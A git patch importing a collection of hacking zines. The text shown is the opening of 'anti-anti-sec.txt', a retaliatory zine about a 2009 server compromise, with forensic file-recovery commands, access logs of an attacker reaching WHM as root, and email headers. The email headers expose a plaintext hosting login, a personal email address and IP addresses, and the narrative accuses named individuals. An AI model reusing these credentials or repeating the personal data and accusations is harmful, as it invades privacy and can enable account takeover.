From 7f7bcee47a372906b574beee48b71c3e74d19582 Mon Sep 17 00:00:00 2001 From: Rui Reis Date: Wed, 14 Dec 2016 20:33:42 +0000 Subject: [PATCH] 1st import into tree --- README.md | 2 + anti-anti-sec/anti-anti-sec.txt | 11156 ++++++++++++++++++++++++++++ anti-sec/astalavista-comments.txt | 136 + anti-sec/astalavista.txt | 1983 +++++ anti-sec/imageshack-pwned.txt | 95 + anti-sec/romeo-last-stand.txt | 291 + anti-sec/ssanz-pwned.txt | 679 ++ anti-sec/txt/ats-policy.txt | 223 + anti-sec/txt/faq1.txt | 92 + anti-sec/txt/faq2.txt | 70 + anti-sec/txt/hack4.txt | 199 + anti-sec/txt/movement.txt | 48 + anti-sec/txt/scene_sub.txt | 54 + 13 files changed, 15028 insertions(+) create mode 100644 README.md create mode 100644 anti-anti-sec/anti-anti-sec.txt create mode 100644 anti-sec/astalavista-comments.txt create mode 100644 anti-sec/astalavista.txt create mode 100644 anti-sec/imageshack-pwned.txt create mode 100644 anti-sec/romeo-last-stand.txt create mode 100644 anti-sec/ssanz-pwned.txt create mode 100644 anti-sec/txt/ats-policy.txt create mode 100644 anti-sec/txt/faq1.txt create mode 100644 anti-sec/txt/faq2.txt create mode 100644 anti-sec/txt/hack4.txt create mode 100644 anti-sec/txt/movement.txt create mode 100644 anti-sec/txt/scene_sub.txt diff --git a/README.md b/README.md new file mode 100644 index 0000000..26823f0 --- /dev/null +++ b/README.md @@ -0,0 +1,2 @@ +# Zines +mirror of my favourite hacking Zines for the lulz and nostalgy diff --git a/anti-anti-sec/anti-anti-sec.txt b/anti-anti-sec/anti-anti-sec.txt new file mode 100644 index 0000000..96c8610 --- /dev/null +++ b/anti-anti-sec/anti-anti-sec.txt 
@@ -0,0 +1,11156 @@ + __ .__ +_____ _____/ |_|__| ______ ____ ____ +\__ \ / \ __\ |/ ___// __ \_/ ___\ + / __ \| | \ | | |\___ \\ ___/\ \___ +(____ /___| /__| |__/____ >\___ >\___ > + \/ \/ \/ \/ \/ *no more* +get yours http://www.network-science.de/ascii/ + + +[0x00] [Introduction] +[0x01] [Forensics] +[0x02] [Target Profiling & Lulz] +[0x03] [ownage.net - prosec] +[0x04] [vitalspeeds - prosec] +[0x05] [makosolutions - prosec] +[0x06] [holeinthewallhosting - prosec] +[0x07] [darkmindz - zf05] +[0x08] [Backdoor RCE] +[0x09] [SEO Optimizing] +[0x10] [Reporting] +[0x11] [Attachments] +[0x12] [Conclusion] +[0x13] [Greetz] + + +_______ _______ _______ +\ _ \ ___ __\ _ \ \ _ \ +/ /_\ \\ \/ / /_\ \/ /_\ \ +\ \_/ \> <\ \_/ \ \_/ \ + \_____ /__/\_ \\_____ /\_____ / + \/ \/ \/ \/ hai:] +.___ __ .___ __ .__ +| | _____/ |________ ____ __| _/_ __ _____/ |_|__| ____ ____ +| |/ \ __\_ __ \/ _ \ / __ | | \_/ ___\ __\ |/ _ \ / \ +| | | \ | | | \( <_> ) /_/ | | /\ \___| | | ( <_> ) | \ +|___|___| /__| |__| \____/\____ |____/ \___ >__| |__|\____/|___| / + \/ \/ \/ \/ + + +What you are about to read is the complete destruction of the "Anti-Sec" group. An organization known +as "ProSec" contacted us with reports containing information about the entire group and how it was operating. +We don't know who they are, they appear to be well-funded and top notch security experts and what +they have done against the group is invaluable to us and others that they have and or would have been targeted. +ProSec did want me to portray a message that organizations similar to the Anti-Sec will and are currently being +targeted by the movement. ProSec already has access to a number of them and are continuously monitoring and gathering +more information about the various groups and will release information when applicable. No longer should whitehats +fear these groups, as soon as an individual is targeted, they will target right back. This is a warning shot to +those out there that target us. 
I want to thank ProSec for the work that they continue to do and understand why this +movement is so important to the security community. + +On the 4th of June 2009, a group named "Anti-Sec" decided to expose Astalavista group after +they successfully exploited what was rumored to be a Litespeed 0day exploit which in reality does not exist. +After looking up on this more and more, a couple of days later we found out that the responsible +person behind this attack was a Saudi-Arabian with the nickname RoMeO, so we decided to let the other +Astalavista staff know about our findings. Joao Pontes, one of the senior Astalavista administrators +decided to warn his friend RoMeO about it and as you will notice below Joao Pontes (rorkty) knew +from the beginning that Astalavista group was compromised by his closest friend and decided to do nothing about it. +Later, on the 9th of June one of my dedicated hosting servers, running a couple of websites was targeted +by the same "Anti-Sec" group providing fake and misleading information to the public. + +The reason that we decided to start looking into this subject, was to see how and why my dedicated hosting +server was compromised despite the fact that it was secure enough to provide access to the outside world. + +Below is a list of some security measures that had been taken to ensure no unauthorized access permitted: + +1) Firewall Protection +2) Brute Force Detection and Prevention +3) Kernel Hardening +4) Apache, PHP, SQL Hardening +5) SSH Hardening +6) Wheel access group for su +7) Chrooted Jail Shell +8) Web Application Firewall +9) Network Intrusion Detection +10) Host Intrustion Detection +11) Hidden daemon versions +12) Rootkit Detection +13) DoS Protection +14) All private sites hosted, audited for bugs +15) Root Access Alert +16) Etc + +Unfortunately the interval between compromisation of the server until the alert reports came to our attention +was not enough to prevent the attack. 
+ +After our research and the information provided by the ProSec group we came to the conclusion that the server was +either hit by an 0day exploit or through my dedicated server provider makosolutions.com which later on it shows +that they were backdoored. + +Utilizing passive and active reconnaissance methods resulted to large information acquisitions which provided +us with means for linking together certain information and shade more light on who we are about to target and +research for the attacks that took place under the "Anti-Sec" label. + +In this log file you will read a limited version of the information gathered and provided, since the most important +parts are being kept private in order to be analyzed by the proper authorities. + + +_______ _______ ____ +\ _ \ ___ __\ _ \/_ | +/ /_\ \\ \/ / /_\ \| | +\ \_/ \> <\ \_/ \ | + \_____ /__/\_ \\_____ /___| + \/ \/ \/ +___________ .__ +\_ _____/__________ ____ ____ _____|__| ____ ______ + | __)/ _ \_ __ \_/ __ \ / \ / ___/ |/ ___\ / ___/ + | \( <_> ) | \/\ ___/| | \\___ \| \ \___ \___ \ + \___ / \____/|__| \___ >___| /____ >__|\___ >____ > + \/ \/ \/ \/ \/ \/ + + +Email Incidents + + +Delivered-To: glafkos@gmail.com +Received: by 10.223.104.212 with SMTP id q20cs268734fao; + Tue, 9 Jun 2009 03:58:03 -0700 (PDT) +Received: by 10.223.113.68 with SMTP id z4mr5075866fap.72.1244545083200; + Tue, 09 Jun 2009 03:58:03 -0700 (PDT) +Return-Path: +Received: from freehostia.com ([66.40.52.21]) + by mx.google.com with ESMTP id 27si6598826fxm.93.2009.06.09.03.58.02; + Tue, 09 Jun 2009 03:58:03 -0700 (PDT) +Received-SPF: neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) client-ip=66.40.52.21; +Authentication-Results: mx.google.com; spf=neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) smtp.mail=root@freehostia.com +Received: from root by freehostia.com with local (Exim 4.63) + 
(envelope-from ) + id 1MDz3p-0002ME-UX + for glafkos@gmail.com; Tue, 09 Jun 2009 11:00:09 +0000 +To: glafkos@gmail.com +Subject: Hosting account: Password reminder +MIME-Version: 1.0 +Content-type: text/plain; charset=UTF-8 +From: Free Hostia +Cc: +Reply-To: +Message-Id: +Date: Tue, 09 Jun 2009 11:00:09 +0000 + +Dear Glask Chwat, + +at 2009-06-09 10:53:25 someone from this IP: 188.51.89.109 has requested your current password for the Control Panel. + +We are sending you your account login details: +username: glachw +password: 1779586 + +If you have any questions, please open a new support ticket from the Help section of the Control Panel. + +Best Regards, +Free Hostia Team + + +/* +Clearly the moron didn't think about using any kind of proxy, or maybe he just couldn't figure out how to use Tor? +As you can see above, he made this request from his home IP. +*/ + + +Delivered-To: glafkos@gmail.com +Received: by 10.223.104.212 with SMTP id q20cs272895fao; + Tue, 9 Jun 2009 05:26:34 -0700 (PDT) +MIME-Version: 1.0 +Received: by 10.216.52.194 with SMTP id e44mr23160wec.34.1244550394375; Tue, + 09 Jun 2009 05:26:34 -0700 (PDT) +Date: Tue, 9 Jun 2009 15:26:34 +0300 +Message-ID: <94a72b260906090526o1aaa5008o86ebfcaa5cc398c2@mail.gmail.com> +Subject: Lol. +From: james knuth +To: glafkos@gmail.com +Content-Type: multipart/alternative; boundary=0016e6de1524296ff7046be97868 + + +http://pastebin.com/m592e1f1c + +It will be all over the net soon, + +Enjoy. + + +// Indeed.. + + +Server Forensics + +root@srv01 [/home/recovery]# du -h --max-depth=1 +608K ./APF_Backup +992K ./Diff +224K ./Latest +3.3M ./LinkNet +46M ./log +1.2M ./modbin +7.5G ./sdb2recover +361M ./sdb3recover +371M ./sdb5recover +121M ./Software +128K ./OpenSSH_Debug +4.5G ./Evidence +15G . 
+root@srv01 [/home/recovery]# + +// Obviously this noobcake didn't know that it was possible to recover deleted files + + +root@srv01 [/home/recovery]# du -h --max-depth=0 sdb* string* +416K sdb2output.txt +7.5G sdb2recover +361M sdb3recover +7.9M sdb3usrdirlist.txt +371M sdb5recover +22M sdb5tmp.txt +64K sdb8deleted_files.txt +2.5M sdb8home.txt +857M stringfile_sdb2.txt +root@srv01 [/home/recovery]# + +root@srv01 [/home/recovery]# ls -lad sd*recover +drwxr-xr-x 17 root root 32768 Jun 15 16:26 sdb2recover +drwxr-xr-x 10 root root 32768 Jun 15 18:09 sdb3recover +drwxr-xr-x 4 root root 32768 Jun 15 22:59 sdb5recover +root@srv01 [/home/recovery]# + + +root@srv01 [/home/recovery]# ./fls -a -r -p /dev/sdb3 > sdb3usrdirlist.txt +root@srv01 [/home/recovery]# grep -i "access_log" /home/recovery/sdb3usrdirlist.txt +r/r 2195490: local/cpanel/logs/access_log +r/r * 2199010(realloc): local/cpanel/logs/access_log-cpanelsync +r/r 2362208: local/apache/logs/access_log +root@srv01 [/home/recovery]# ./icat -r -s -f ext3 /dev/sdb3 2195490 > /tmp/access_log +root@srv01 [/home/recovery]# ls -la /tmp/access_log +-rw-r--r-- 1 root root 13312000 Jun 11 03:38 /tmp/access_log +root@srv01 [/home/recovery]# + +// Someone needs to learn how to cover his tracks... try... 
"man dd" + + +root@srv01 [/home/recovery]# cat /tmp/access_log | grep 188.54 +188.54.114.181 - - [06/08/2009:10:59:52 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:10:59:59 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_01_webmail.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 301 0 
"https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - glafkos@infosec.org.uk [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET /favicon.ico HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:12 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET 
/unprotected/cpanel/images/log_01_whm.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:16 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:27 -0000] "GET /unprotected/cpanel/images/button-bg-over.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:29 -0000] "POST /login/ HTTP/1.1" 301 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:32 -0000] "GET / HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=topframe.html HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=main HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root 
[06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994913/combined_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994907/themes/x/style_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994905/themes/x/logo.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1192071000/lock.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/serverconfig.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/support.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1231994880/js/hidecells.js HTTP/1.1" 200 0 
"https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/networksetup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/security.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/servercontacts.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/resellers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/languages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/backup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; 
rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/transfers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/systemreboot.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/serverstatus.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/account-info.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/account-functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/themes/x/icons/functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root 
[06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/frontpage.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/themes.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/packages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/dnsfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/sql.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/ipfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/diskdrives.gif HTTP/1.1" 200 0 
"https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/software.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/email.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/health.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/yui/utilities/utilities.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/cpanel.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/ssl.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) 
